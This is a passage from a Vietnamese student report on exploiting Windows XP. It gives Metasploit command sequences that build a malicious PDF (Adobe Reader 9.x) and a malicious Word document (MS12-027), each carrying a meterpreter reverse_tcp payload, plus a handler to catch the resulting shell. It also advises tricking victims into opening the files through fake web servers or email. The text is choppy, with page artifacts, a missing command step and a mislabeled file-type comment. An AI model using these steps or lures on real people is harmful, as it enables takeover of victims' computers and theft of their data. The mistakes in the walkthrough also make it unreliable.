Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ thống, Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload files, thay đổi cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài trojan/ backdoor, …
4 Xâm nhập và khai thác Windows XP
b) Phần mềm bị ảnh hưởng:
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Trang 26SVTH: Huỳnh Quốc Anh Trang 25
có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính
Trang 27SVTH: Huỳnh Quốc Anh Trang 26
…) và máy nạn nhân đang sử dụng AdobeReader 9.x máy nạn nhân sẽ bị “nhiễm độc”
b) Phần mềm bị ảnh hưởng:
Adobe Reader 9.x chạy trên nền Windows XP SP3
c) Cách thực hiện tấn công:
Điều kiện: Victim phải cài đặt phần mền Adobe Reader 9.x
Khởi động msfconsole tử cửa sổ terminal của BackTrack
> msfconsole
Khai báo lỗ hổng sử dụng và thiết đặt options:
> Search nojs
Trang 28SVTH: Huỳnh Quốc Anh Trang 27
> use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
> show options
> set filename test.pdf (đây là tên do mình tự đặt với cú pháp *.pdf)
> set payload windows/meterpreter/reverse_tcp
Tới đây chúng ta bắt đầu gửi file pdf vừa tạo cho máy nạn nhân, khi nạn nhân
mở file backtrack sẽ gửi mã độc và chiếm được quyền sử dụng máy nạn nhân
4.4 Khai thác lỗ hỏng Ms12-027
a) Mô tả:
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi doc và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn có thể tạo một web server giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi kèm theo mail, …)
b) Phần mềm bị ảnh hưởng:
Microsoft Office 2003
Microsoft Office 2007
Microsoft Office 2010 (ngoại trừ phiên bản x64-based editions)
Microsoft SQL Server 2000 Analysis Services
Microsoft SQL Server 2000 (ngoại trừ phiên bản Itanium-based editions)
Trang 29SVTH: Huỳnh Quốc Anh Trang 28
Microsoft SQL Server 2005 (đối với Microsoft SQL Server 2005 Express Edition chỉ thực hiện được trên Advanced Services)
Microsoft SQL Server 2008
Microsoft SQL Server 2008 R2
Microsoft BizTalk Server 2002
Microsoft Commerce Server 2002
Microsoft Commerce Server 2007
Microsoft Commerce Server 2009
Microsoft Commerce Server 2009 R2
Microsoft Visual FoxPro 8.0
Microsoft Visual FoxPro 9.0
Visual Basic 6.0 Runtime
c) Cách thực hiện tấn công:
Điều kiện: Victim phải cài đặt phần mềm Microsoft Office Word 2007
Khởi động msfconsole tử cửa sổ terminal của BackTrack
> set filename test.doc (đây là tên do mình tự đặt với cú pháp *.pdf)
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.192.130
> set lport 7777
> exploit
Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file word có chứa
mã độc, file sẽ được lưu tại root./msf4/test.doc
Tiếp tục thực hiện các bước sau:
> use exploit/multi/handler
> set payload /windows/meterpreter/reverse_tcp